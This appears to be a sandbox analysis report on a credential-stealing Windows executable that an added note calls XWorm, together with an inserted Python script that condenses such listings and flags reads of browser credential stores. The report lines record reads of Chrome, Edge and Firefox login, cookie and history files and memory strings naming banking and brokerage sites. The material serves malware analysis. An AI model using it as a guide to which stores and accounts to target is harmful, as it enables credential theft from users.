Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3255537641.0000000000841000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: discord.comVMware20,11696428655f |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: Yara match |
File source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
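The two behaviour groups above (the repeated SetErrorMode NOOPENFILEERRORBOX entries and the reads of Chrome, Edge and Firefox profile stores) are the kind of flattened listing an analyst has to condense by hand. The following triage script is an added example written for this page; it is not part of the sandbox report or of the XWorm sample. It assumes the "Source: ... |" / "<event>: <value> |" line format seen here, and the table mapping profile paths to the artifact class they hold is the editor's own (Login Data, Network\Cookies, Web Data and History for Chromium-based browsers; cookies.sqlite, places.sqlite, logins.json and key4.db for Firefox). The sample input is constructed for the example and uses a placeholder executable name.

```python
"""Condense a flattened sandbox behaviour listing into a short triage summary.

Added example, not the report's own tooling. Assumptions: the input uses the
'Source: ... |' followed by '<event kind>: <value> |' line format shown on the
page; 'Jump to behavior |' lines are navigation residue and are dropped; the
BROWSER_STORES table is the editor's mapping, not something the sample declares.
"""
import re
from collections import Counter

# Profile files a credential stealer typically reads, keyed by a path-suffix
# regex. Editor's table; extend it for other browsers as needed.
BROWSER_STORES = {
    r"\\Login Data$": "saved logins (Chromium-based)",
    r"\\Network\\Cookies$": "cookies (Chromium-based)",
    r"\\Web Data$": "autofill and payment data (Chromium-based)",
    r"\\History$": "browsing history (Chromium-based)",
    r"\\cookies\.sqlite$": "cookies (Firefox)",
    r"\\places\.sqlite$": "history and bookmarks (Firefox)",
    r"\\logins\.json$": "saved logins (Firefox)",
    r"\\key4\.db$": "password database key (Firefox)",
}

SOURCE_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|$")
EVENT_RE = re.compile(r"^(?P<kind>[A-Za-z ]+):\s*(?P<val>.*?)\s*\|$")

# Constructed sample in the page's line format (not taken from the report).
SAMPLE = r"""
Source: C:\Users\user\Desktop\sample.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\sample.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\sample.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\sample.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default-release\cookies.sqlite |
Jump to behavior |
Source: C:\Users\user\Desktop\sample.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\sample.exe |
File opened: C:\Users\user\Documents\notes.txt |
Jump to behavior |
"""


def parse_report(text):
    """Yield (source, event kind, value) triples; skip residue and blanks."""
    source = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Jump to behavior"):
            continue
        m = SOURCE_RE.match(line)
        if m:
            source = m.group("src")
            continue
        m = EVENT_RE.match(line)
        if m and source is not None:
            yield source, m.group("kind"), m.group("val")


def classify_path(path):
    """Return the artifact class for a browser profile store, else None."""
    for pattern, label in BROWSER_STORES.items():
        if re.search(pattern, path, re.IGNORECASE):
            return label
    return None


def summarize(text):
    """Collapse repeated events into counts and group credential-store reads.

    Returns (counts, stores): counts maps (kind, value) to how often it
    occurred; stores maps an artifact class to the set of paths read.
    """
    counts = Counter()
    stores = {}
    for _source, kind, value in parse_report(text):
        counts[(kind, value)] += 1
        if kind == "File opened":
            label = classify_path(value)
            if label:
                stores.setdefault(label, set()).add(value)
    return counts, stores


if __name__ == "__main__":
    counts, stores = summarize(SAMPLE)
    for (kind, value), n in counts.most_common():
        print(f"{n:3d}x {kind}: {value}")
    for label in sorted(stores):
        print(f"credential-store read: {label}")
        for path in sorted(stores[label]):
            print(f"    {path}")
```

Run it against the report's own lines to get one line per distinct event with a repeat count instead of dozens of identical entries, plus a per-artifact list of which browser stores the process touched; an unclassified path such as the constructed notes.txt is counted but not flagged, which keeps the credential-access summary limited to known profile files.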
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: Yara match |
File source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |